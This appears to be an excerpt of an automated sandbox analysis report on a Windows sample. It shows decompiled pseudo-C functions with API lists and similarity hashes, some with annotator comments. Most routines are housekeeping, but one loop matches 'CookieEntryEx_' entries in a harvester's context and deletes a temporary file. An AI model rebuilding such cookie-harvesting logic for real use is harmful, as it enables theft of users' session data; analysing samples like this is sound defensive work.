		return 0;
	} else {
		_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
		return _t8;
	}
}

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,0040D004,?,?,?,?,?,?,?), ref: 0040CE4E
• GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0040CE68
• GetProcessTimes.KERNELBASE(?,?,?,?,?,?,0040D004,?,?,?,?,?,?,?), ref: 0040CE8B
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: AddressHandleModuleProcProcessTimes
• String ID: GetProcessTimes$kernel32.dll
• API String ID: 1714573020-3385500049
• Opcode ID: 7c29d18577e7c0631cc297a8390a3d95ad77c93ea76d0503e1a5782c5d7fe6cc
• Instruction ID: 9062282254ac126051856908680c029023e6c569a8a6eaee544e1b96dd2f004d
• Opcode Fuzzy Hash: 7c29d18577e7c0631cc297a8390a3d95ad77c93ea76d0503e1a5782c5d7fe6cc
• Instruction Fuzzy Hash: E7F03031141209FFDF218FA0ED45F963BA8AB14301F008176F92CA1AB0D77585A4DB9C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%
E004076F4(intOrPtr* __edi) {
	void* __esi;
	void** _t11;
	intOrPtr* _t18;
	intOrPtr* _t27;
	void* _t28;
	intOrPtr _t31;
	intOrPtr _t32;
	intOrPtr _t33;
	intOrPtr _t34;
	intOrPtr* _t36;

	_t27 = __edi;
	 *__edi = 0x410168;
	E0040768E(__edi);
	_t31 =  *((intOrPtr*)(__edi + 0x14));
	if(_t31 != 0) {
		E00406355(_t31);
		_push(_t31);
		L0040E032();
	}
	_t32 =  *((intOrPtr*)(_t27 + 0x10));
	if(_t32 != 0) {
		E00406355(_t32);
		_push(_t32);
		L0040E032();
	}
	_t33 =  *((intOrPtr*)(_t27 + 0xc));
	if(_t33 != 0) {
		E00406355(_t33);
		_push(_t33);
		L0040E032();
	}
	_t34 =  *((intOrPtr*)(_t27 + 8));
	if(_t34 != 0) {
                                                                                                                                                					E00406355(_t34);
                                                                                                                                                					_push(_t34);
                                                                                                                                                					L0040E032();
                                                                                                                                                				}
                                                                                                                                                				_t18 = _t27;
                                                                                                                                                				_pop(_t35);
                                                                                                                                                				_push(_t27);
                                                                                                                                                				_t36 = _t18;
                                                                                                                                                				_t28 = 0;
                                                                                                                                                				if( *((intOrPtr*)(_t36 + 4)) > 0 &&  *((intOrPtr*)(_t36 + 0x3c)) > 0) {
                                                                                                                                                					do {
                                                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)(E00407588(_t36, _t28))) + 0xc))();
                                                                                                                                                						_t28 = _t28 + 1;
                                                                                                                                                					} while (_t28 <  *((intOrPtr*)(_t36 + 0x3c)));
                                                                                                                                                				}
                                                                                                                                                				_t11 =  *((intOrPtr*)( *_t36))();
                                                                                                                                                				free( *_t11); // executed
                                                                                                                                                				return _t11;
                                                                                                                                                			}













                                                                                                                                                0x004076f4
                                                                                                                                                0x004076f7
                                                                                                                                                0x004076fd
                                                                                                                                                0x00407702
                                                                                                                                                0x00407707
                                                                                                                                                0x00407709
                                                                                                                                                0x0040770e
                                                                                                                                                0x0040770f
                                                                                                                                                0x00407714
                                                                                                                                                0x00407715
                                                                                                                                                0x0040771a
                                                                                                                                                0x0040771c
                                                                                                                                                0x00407721
                                                                                                                                                0x00407722
                                                                                                                                                0x00407727
                                                                                                                                                0x00407728
                                                                                                                                                0x0040772d
                                                                                                                                                0x0040772f
                                                                                                                                                0x00407734
                                                                                                                                                0x00407735
                                                                                                                                                0x0040773a
                                                                                                                                                0x0040773b
                                                                                                                                                0x00407740
                                                                                                                                                0x00407742
                                                                                                                                                0x00407747
                                                                                                                                                0x00407748
                                                                                                                                                0x0040774d
                                                                                                                                                0x0040774e
                                                                                                                                                0x00407750
                                                                                                                                                0x00407757
                                                                                                                                                0x00407758
                                                                                                                                                0x0040775a
                                                                                                                                                0x0040775f
                                                                                                                                                0x00407766
                                                                                                                                                0x00407770
                                                                                                                                                0x00407773
                                                                                                                                                0x00407774
                                                                                                                                                0x00407766
                                                                                                                                                0x0040777d
                                                                                                                                                0x00407781
                                                                                                                                                0x00407789

APIs
  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 0040769A
  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076A8
  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076B9
  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D0
  • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D9
• ??3@YAXPAX@Z.MSVCRT ref: 0040770F
• ??3@YAXPAX@Z.MSVCRT ref: 00407722
• ??3@YAXPAX@Z.MSVCRT ref: 00407735
• ??3@YAXPAX@Z.MSVCRT ref: 00407748
• free.MSVCRT(00000000), ref: 00407781
  • Part of subcall function 00406355: free.MSVCRT(00000000,004065BB,74B04E00,?,00000000), ref: 0040635C
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: ??3@$free
• String ID:
• API String ID: 2241099983-0
• Opcode ID: 3a37e351f286feef7fe61f1ea2a5e01824fbcdfc648e7528773bb4aad7918a6a
• Instruction ID: c8a6b3cb51e6e8f56dec58333c0ea0519a89c45fbe64381fe3d5b910dcd78a78
• Opcode Fuzzy Hash: 3a37e351f286feef7fe61f1ea2a5e01824fbcdfc648e7528773bb4aad7918a6a
• Instruction Fuzzy Hash: 9901C232E099305BC6257B3AD40191EB3A9AE80BA0316453FE905B73D1CB7C7C518ADE
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 85%
			// Returns a wide string for field index _a4 (valid range 0..0xa) of the object in __ecx.
			// _a8 is the caller's output buffer: it is emptied first and is itself returned for out-of-range indices
			// and for the cases that format into it. The left column is the decompiler's instruction address for each
			// statement; 0x00000000 marks labels and gotos that have no instruction of their own.
			E00401DCF(void* __ecx, signed int _a4, signed short* _a8) {
				signed int _t23;
				signed short* _t24;
				void* _t27;
				signed short* _t32;

0x00401dd5			_t23 = _a4;
0x00401dda			_t32 = _a8;
0x00401ddd			 *_t32 =  *_t32 & 0x00000000;                 // write an empty string (first wchar = 0) into the output buffer
0x00401de3			_t27 = 0xa;                                   // highest valid field index
0x00401de6			if(_t23 > _t27) {
0x00401e40				L12:
0x00401e40				_t24 = _t32;                              // return the (possibly filled) output buffer
0x00401e42				L13:
0x00401e47				return _t24;
0x00401e47			}
0x00401de8			switch( *((intOrPtr*)(_t23 * 4 +  &M00401E73))) {   // jump table at 0x00401E73 indexed by _a4
0x00000000				case 0:
0x00401e4a					__eax = __ecx + 0x38;                 // index 0: E00401D90 formats the member at +0x38 into the buffer
0x00000000					goto L15;
0x00000000				case 1:
0x00401e55					__eax = __ecx + 0x30;                 // index 1: same, for the member at +0x30
0x00401e4d					L15:
0x00401e4e					__eax = E00401D90(__eax, __esi); // executed
0x00000000					goto L12;
0x00000000				case 2:
0x00401e5a					__ecx =  *((intOrPtr*)(__ecx + 0x10));   // indices 2..5: load the member at +0x10/+0x14/+0x18/+0x1c and look it up at L3
0x00000000					goto L18;
0x00000000				case 3:
0x00401e64					__ecx =  *((intOrPtr*)(__ecx + 0x14));
0x00000000					goto L18;
0x00000000				case 4:
0x00401e69					__ecx =  *((intOrPtr*)(__ecx + 0x18));
0x00000000					goto L18;
				(address column ends here in this excerpt)
					case 5:
						__ecx =  *((intOrPtr*)(__ecx + 0x1c));
						L18:
						__eax = 0x412320;                     // the decompiler shows 0x412320 here but 0x412340 at L3 for the same call; which one is passed is not resolved on this page
						goto L3;
					case 6:
						__eflags =  *(__ecx + 0x40) & 0x00000001;   // indices 6..8: test one flag bit (1, 0x2000, 0x4000) of the dword at +0x40
						goto L6;
					case 7:
						__eflags =  *(__ecx + 0x40) & 0x00002000;
						goto L6;
					case 8:
						__eflags =  *(__ecx + 0x40) & 0x00004000;
						L6:
						if(__eflags == 0) {
							_push(9);                         // __ebx = 9 when the bit is clear; its value when the bit is set is not assigned in the recovered code
							_pop(__ebx);
						}
						__eax = E00406827(__ebx);             // the result of E00406827(__ebx) is returned as-is
						goto L13;
					case 9:
						_push( *((intOrPtr*)(__ecx + 0x2c)));   // index 9: 64-bit value at +0x28/+0x2c formatted with L"%I64d" into the buffer
						_push( *((intOrPtr*)(__ecx + 0x28)));
						_push(L"%I64d");
						_push(0xff);
						_push(__esi);
						L0040DFD6();                          // five-argument CRT printf-family thunk (argument layout matches _snwprintf(buffer, 0xff, L"%I64d", value)); not resolved on this page
						__esp = __esp + 0x14;
						goto L12;
					case 0xa:
						_t30 =  *((intOrPtr*)(__ecx + 0x20));   // index 0xa: member at +0x20 goes through the same lookup
						L3:
						_t24 = E00406306(0x412340, _t30);     // lookup; on a zero result the fallback pointer 0x40f454 is returned instead
						if(_t24 == 0) {
							_t24 = 0x40f454;
						}
						goto L13;
				}
			}

                                                                                                                                                0x00000000
                                                                                                                                                0x00401e6e
                                                                                                                                                0x00401e5d
                                                                                                                                                0x00401e5d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401e07
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401e1f
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401e17
                                                                                                                                                0x00401e0b
                                                                                                                                                0x00401e0b
                                                                                                                                                0x00401e0d
                                                                                                                                                0x00401e0f
                                                                                                                                                0x00401e0f
                                                                                                                                                0x00401e10
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401e27
                                                                                                                                                0x00401e2a
                                                                                                                                                0x00401e2d
                                                                                                                                                0x00401e32
                                                                                                                                                0x00401e37
                                                                                                                                                0x00401e38
                                                                                                                                                0x00401e3d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00401def
                                                                                                                                                0x00401df7
                                                                                                                                                0x00401df7
                                                                                                                                                0x00401dfe
                                                                                                                                                0x00401e00
                                                                                                                                                0x00401e00
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: _snwprintf
• String ID: #A$%I64d$@#A
• API String ID: 3988819677-2754857024
• Opcode ID: 39a1b14ef70dc346d1b612ee092b96a4144a5099e147f5cc33a0ca018d1c3096
• Instruction ID: 57e1b299ab2ee78cab24039c69e456b61a4fcaae797c094412e686c8a915beca
• Opcode Fuzzy Hash: 39a1b14ef70dc346d1b612ee092b96a4144a5099e147f5cc33a0ca018d1c3096
• Instruction Fuzzy Hash: A811BF31204204D7D724AA54D841AA97369BB01358B3004BFFE16AE2E2D77AD953D3CE
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
#include <windows.h> /* include added for FindResourceW/SizeofResource/LoadResource/LockResource */

int E0040D9FC(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
	struct HRSRC__* _t12;
	void* _t16;
	void* _t17;
	signed int _t18;
	signed int _t26;
	signed int _t29;
	signed int _t33;
	struct HRSRC__* _t35;
	signed int _t36;
	unsigned int* _t7; /* declaration added; missing from the decompiler output */

	_t12 = FindResourceW(_a4, _a12, _a8); // executed
	_t35 = _t12;
	if(_t35 != 0) {
		_t33 = SizeofResource(_a4, _t35);
		if(_t33 > 0) {
			_t16 = LoadResource(_a4, _t35);
			if(_t16 != 0) {
				_t17 = LockResource(_t16);
				if(_t17 != 0) {
					/* walk the locked resource as 32-bit words and fold them into a running value */
					_a4 = _t33;
					_t29 = _t33 * _t33;
					_t36 = 0;
					_t7 = &_a4;
					*_t7 = _a4 >> 2; /* number of 4-byte words in the resource */
					if(*_t7 != 0) {
						do {
							_t26 = *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^ *(_t17 + _t36 * 4) + _t29;
							_t36 = _t36 + 1;
							_t29 = _t26;
						} while (_t36 < _a4);
					}
					/* mix the result into the global at 0x412b10 */
					_t18 = *0x412b10; // 0x10350e5a
					*0x412b10 = _t18 + _t29 ^ _t33;
				}
			}
		}
	}
	return 1;
}

APIs
• FindResourceW.KERNELBASE(?,?,?), ref: 0040DA09
• SizeofResource.KERNEL32(?,00000000), ref: 0040DA1A
• LoadResource.KERNEL32(?,00000000), ref: 0040DA2A
• LockResource.KERNEL32(00000000), ref: 0040DA35
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: 3f2537d69a83dbad711086520e7fd7dadb7db9e2dcff2647f4325042d9b9d9c7
• Instruction ID: 1e085ebe6cf1454c0a13dd2dc3297af32645bfe8ec8fc95f9f4fc45ffd099028
• Opcode Fuzzy Hash: 3f2537d69a83dbad711086520e7fd7dadb7db9e2dcff2647f4325042d9b9d9c7
• Instruction Fuzzy Hash: 9B018032B04215ABCB299FE5DD4995BBFAAFB853907048036AC09EA360D770CD14CAD8
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
#include <stdlib.h> /* include added for malloc/free */
#include <string.h> /* include added for memcpy */

int E0040562D(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
	void* _t8;
	void* _t13;
	signed int _t16;
	void** _t21;
	signed int _t22;
	char* _t1; /* declaration added; missing from the decompiler output */

	_t21 = __edi;
	_t22 = *__eax; /* current element capacity */
	if(__edx < _t22) {
		return 0;
	} else {
		_t13 = *__edi; /* old buffer */
		/* grow the capacity by the step in _a8 until it exceeds the requested index */
		do {
			_t1 = &_a8; // 0x40655f
			*__eax = *__eax + *_t1;
			_t16 = *__eax;
		} while (__edx >= _t16);
		_t8 = malloc(_t16 * _a4); // executed
		*__edi = _t8;
		if(_t22 > 0) {
			/* copy the old contents (element size _a4) into the new buffer and release the old one */
			if(_t8 != 0) {
				memcpy(_t8, _t13, _t22 * _a4);
			}
			free(_t13); // executed
		}
		return 0 | *_t21 != 0x00000000;
	}
}

APIs
• malloc.MSVCRT ref: 00405649
• memcpy.MSVCRT ref: 00405661
• free.MSVCRT(00000000,00000000,?,00406343,00000002,?,00000000,?,0040655F,74B04E00,?,00000000), ref: 0040566A
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: freemallocmemcpy
• String ID: _e@
• API String ID: 3056473165-4143410925
• Opcode ID: 3078e6390c3b9a2d3984cf8c16c15fdfdd782231e9a83da3d75a0699d865d50d
• Instruction ID: 65c1df984c8dd591618957182971b53504cae5b365517194d008c843f4823b23
• Opcode Fuzzy Hash: 3078e6390c3b9a2d3984cf8c16c15fdfdd782231e9a83da3d75a0699d865d50d
• Instruction Fuzzy Hash: 78F0E2B26052229FC718AB76B98184BB3ADEF443247504C3FF408E3281D7399C50CFA8
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 60%
			E004061CD(FILETIME* __edi, signed int* __esi) {
				struct _SYSTEMTIME _v20;
				struct _SYSTEMTIME _v36;
				int _t12;

				if(__edi->dwHighDateTime != 0) {
					FileTimeToSystemTime(__edi,  &_v20);
					_t12 = SystemTimeToTzSpecificLocalTime(0,  &_v20,  &_v36); // executed
					_push(__esi);
					if(_t12 == 0) {
						return FileTimeToLocalFileTime(__edi, ??);
					} else {
						SystemTimeToFileTime( &_v36, ??);
						return 1;
					}
				} else {
					 *__esi =  *__esi & 0x00000000;
					__esi[1] = __esi[1] & 0x00000000;
					return 0;
				}
			}

APIs
• FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,00401DAD), ref: 004061E9
• SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,00401DAD), ref: 004061F9
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00401DAD), ref: 00406208
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: Time$System$File$LocalSpecific
• String ID:
• API String ID: 979780441-0
• Opcode ID: 7151ffe715f6e20ab243f245306c6cfdc10268265a47bf40f88944b89cde35d5
• Instruction ID: ac9071ec82a3ebeda66c59c5f140a76e8f402871b7042997bc81315e07851fa8
• Opcode Fuzzy Hash: 7151ffe715f6e20ab243f245306c6cfdc10268265a47bf40f88944b89cde35d5
• Instruction Fuzzy Hash: 86F05E729101099BDB209BA0DD49BBBB3FCFB4470AF04443AE502E2080EB74D4088BA5
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 72%
			E0040E490() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x413270; // 0xa10048
				if(_t1 != 0) {
					_push(_t1); // executed
					L0040E032(); // executed
				}
				_t2 =  *0x413278; // 0xb17090
				if(_t2 != 0) {
					_push(_t2);
					L0040E032();
				}
				_t3 =  *0x413274; // 0xb178a0
				if(_t3 != 0) {
					_push(_t3); // executed
					L0040E032(); // executed
				}
				_t4 =  *0x41327c; // 0xb17498
				if(_t4 != 0) {
					_push(_t4); // executed
					L0040E032(); // executed
					return _t4;
				}
				return _t4;
			}

APIs
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: b2228df5345cd7625d4464fd924bb73bf3a5cd492e4ab034a3356190575b741a
• Instruction ID: b52db2e07b3ad488cd6e1e6deac71131c93cc09f27119b6233636937a2a2f9d5
• Opcode Fuzzy Hash: b2228df5345cd7625d4464fd924bb73bf3a5cd492e4ab034a3356190575b741a
• Instruction Fuzzy Hash: 65E01970300211A6DE28AA3BEC41A03238C3A003AA318CC7AF404F72E0CA7CE860882C
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                			E0040BD40(void* __eax, void* __edx, void* __eflags) {
                                                                                                                                                				intOrPtr _v4;
                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                				void* __edi;
                                                                                                                                                				void* __esi;
                                                                                                                                                				signed int _t33;
                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                				signed int _t43;
                                                                                                                                                				intOrPtr _t54;
                                                                                                                                                				intOrPtr* _t55;
                                                                                                                                                				void* _t60;
                                                                                                                                                				void* _t61;
                                                                                                                                                				signed int _t65;
                                                                                                                                                				intOrPtr _t66;
                                                                                                                                                				void* _t71;
                                                                                                                                                				/* declarations missing from the listing for temporaries used below */
                                                                                                                                                				intOrPtr _t42;
                                                                                                                                                				void* _t57;
                                                                                                                                                				signed int _t79;
                                                                                                                                                
                                                                                                                                                				_t60 = __edx;
                                                                                                                                                				_t54 = 0;
                                                                                                                                                				_t61 = __eax;
                                                                                                                                                				_v4 = 0;
                                                                                                                                                				E00401EA3( *((intOrPtr*)(__eax + 0x69c)), __eflags, 0, 0);
                                                                                                                                                				 *((intOrPtr*)(_t61 + 0x208)) = 0;
                                                                                                                                                				_t71 = 0;
                                                                                                                                                				_v16 = 0;
                                                                                                                                                				if( *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30)) - 1 <= 0) {
                                                                                                                                                					L18:
                                                                                                                                                					return _v4;
                                                                                                                                                				} else {
                                                                                                                                                					goto L1;
                                                                                                                                                				}
                                                                                                                                                				do {
                                                                                                                                                					L1:
                                                                                                                                                					_t33 =  *((intOrPtr*)(_t61 + 0x6c0));
                                                                                                                                                					if(_t54 >=  *((intOrPtr*)(_t33 + 0x30))) {
                                                                                                                                                						_t65 = 0x40f454;
                                                                                                                                                					} else {
                                                                                                                                                						_t33 = E00406306(_t33, _t54);
                                                                                                                                                						_t65 = _t33;
                                                                                                                                                					}
                                                                                                                                                					_push(_t65);
                                                                                                                                                					_push(L"/stext");
                                                                                                                                                					L0040E03E();
                                                                                                                                                					_pop(_t57);
                                                                                                                                                					if(_t33 != 0) {
                                                                                                                                                						_t34 = E0040BCAA(_t33, _t65);
                                                                                                                                                						__eflags = _t34;
                                                                                                                                                						if(_t34 <= 0) {
                                                                                                                                                							goto L8;
                                                                                                                                                						}
                                                                                                                                                						goto L7;
                                                                                                                                                					} else {
                                                                                                                                                						_t34 = _t33 + 1;
                                                                                                                                                						L7:
                                                                                                                                                						_v8 = _t34;
                                                                                                                                                						_t10 = _t54 + 1; // 0x2
                                                                                                                                                						_t71 = _t10;
                                                                                                                                                					}
                                                                                                                                                					L8:
                                                                                                                                                					_t54 = _t54 + 1;
                                                                                                                                                				} while (_t54 <  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30)) - 1);
                                                                                                                                                				_t66 = _v8;
                                                                                                                                                				if(_t66 > 0) {
                                                                                                                                                					E0040B147(_t61, _t57, 0); // executed
                                                                                                                                                					E0040A4C2(_t61);
                                                                                                                                                					_t42 =  *((intOrPtr*)(_t61 + 0x6c0));
                                                                                                                                                					if(_t71 >=  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x6c0)) + 0x30))) {
                                                                                                                                                						_t43 = 0x40f454;
                                                                                                                                                					} else {
                                                                                                                                                						_t57 = _t71;
                                                                                                                                                						_t43 = E00406306(_t42, _t71);
                                                                                                                                                					}
                                                                                                                                                					_t79 = _t66 - 8;
                                                                                                                                                					if(_t66 != 8) {
                                                                                                                                                						E004096FE( *((intOrPtr*)(_t61 + 0x69c)), _t60, __eflags, _t43, _t66); // executed
                                                                                                                                                					} else {
                                                                                                                                                						E0040ACA7(_t61, _t57, _t60, _t79, _t43, 0);
                                                                                                                                                					}
                                                                                                                                                					_t55 =  *((intOrPtr*)(_t61 + 0x69c));
                                                                                                                                                					_v4 = 1;
                                                                                                                                                					if(_t55 != 0) {
                                                                                                                                                						 *_t55 = 0x40f648;
                                                                                                                                                						 *((intOrPtr*)(_t55 + 0x34c)) = 0x40f6e0;
                                                                                                                                                						E00403F55(_t55 + 0xbf0);
                                                                                                                                                						E0040623E(_t55 + 0xbd0);
                                                                                                                                                						E0040623E(_t55 + 0xbac);
                                                                                                                                                						E00406355(_t55 + 0xb98);
                                                                                                                                                						 *((intOrPtr*)(_t55 + 0x34c)) = 0x40f948;
                                                                                                                                                						E00403FBE(_t55 + 0x350);
                                                                                                                                                						E004076F4(_t55);
                                                                                                                                                						_push(_t55);
                                                                                                                                                						L0040E032();
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				goto L18;
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040BD9B
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040BE86
                                                                                                                                                  • Part of subcall function 0040BCAA: _wcsicmp.MSVCRT ref: 0040BCB0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp$??3@
                                                                                                                                                • String ID: /stext
                                                                                                                                                • API String ID: 3682227554-3817206916
                                                                                                                                                • Opcode ID: e9a93c4c525a8eef83f821961eac4f0053dce98a787a6edb1d843895f468d4c2
                                                                                                                                                • Instruction ID: d8bbb9b930e80b6915cfb13594633440f620dbacd53bdbbf48f85004c8b902b2
                                                                                                                                                • Opcode Fuzzy Hash: e9a93c4c525a8eef83f821961eac4f0053dce98a787a6edb1d843895f468d4c2
                                                                                                                                                • Instruction Fuzzy Hash: CF31A6316002019BD710FE26D88169AB799FF40358F01057FFC09BB292CB7DA81987ED
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 81%
			// Instruction addresses from the report's address column are given as trailing comments.
			// __edi points at the harvester's context structure: entry table at +0x420,
			// entry count at +0x42c, wide-char path of a temporary file at +0x430.
			E00403EAC(void* __ecx, void* __edx, void* __edi) {                       // 0x00403eac
				intOrPtr _v8;
				void* __esi;
				intOrPtr _t9;
				void* _t14;
				void* _t18;  // used below but missing from the decompiler's declarations
				void* _t21;
				void* _t22;
				void* _t24;
				WCHAR* _t27;
				signed int _t28;
				signed int _t29;

				_t22 = __edi;                                                          // 0x00403eac
				_t21 = __edx;                                                          // 0x00403eac
				_t29 = _t28 & 0xfffffff8;                                              // 0x00403eaf  (reads as stack alignment, and esp, -8)
				_push(__ecx);                                                          // 0x00403eb2
				_push(__ecx);                                                          // 0x00403eb3
				_t9 = E004039F6(__edi); // executed                                    // 0x00403eb8  prepares the source (subcall uses memset/wcslen, see APIs)
				_t24 = 0;                                                              // 0x00403ebd  entry index
				_v8 = _t9;                                                             // 0x00403ec1
				if(_t9 != 0) {                                                         // 0x00403ec5  non-zero = failure, passed back to the caller
					L7:                                                            // 0x00403f21
					return _v8;                                                    // 0x00403f2a
				}                                                                      // 0x00403f2a
				if( *((intOrPtr*)(__edi + 0x42c)) <= 0) {                              // 0x00403ecd  no entries: skip straight to cleanup
					L5:                                                            // 0x00403f02
					E0040405E(_t22 + 4);                                           // 0x00403f05  release what E004039F6 set up
					_t27 = _t22 + 0x430;                                           // 0x00403f0a  wide-char path of the temporary file
					if( *_t27 != 0) {                                              // 0x00403f14  path set?
						DeleteFileW(_t27); // executed                         // 0x00403f17  remove the file ...
						 *_t27 =  *_t27 & 0x00000000;                          // 0x00403f1d  ... and clear the path so it is not deleted twice
					}                                                              // 0x00403f1d
					goto L7;
				} else {
					goto L2;
				}
				do {                                                                   // 0x00403ecf
					L2:                                                            // 0x00403ecf
					_t14 = E00403F2B(_t24, _t22 + 0x420);                          // 0x00403ed7  name of entry _t24
					_push(0xe);                                                    // 0x00403edc  14 characters = the whole prefix, so this is a prefix test
					_t18 = _t14;                                                   // 0x00403ede  keep the name for the call below
					_push(L"CookieEntryEx_");                                      // 0x00403ee0
					_push(_t14);                                                   // 0x00403ee5
					L0040E044();                                                   // 0x00403ee6  _wcsnicmp(name, L"CookieEntryEx_", 0xe): case-insensitive
					_t29 = _t29 + 0xc;                                             // 0x00403eeb
					if(_t14 == 0) {                                                // 0x00403ef0  _t14 now holds the _wcsnicmp result; 0 = prefix matched
						E00403BAF(_t21, _t22, _t18); // executed                // 0x00403ef4  process the matching entry (_t18 = its name)
					}                                                              // 0x00403ef4
					_t24 = _t24 + 1;                                               // 0x00403ef9
				} while (_t24 <  *((intOrPtr*)(_t22 + 0x42c)));                      // 0x00403efa
				goto L5;
			}

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004039F6: memset.MSVCRT ref: 00403A36
                                                                                                                                                  • Part of subcall function 004039F6: memset.MSVCRT ref: 00403A50
                                                                                                                                                  • Part of subcall function 004039F6: wcslen.MSVCRT ref: 00403A68
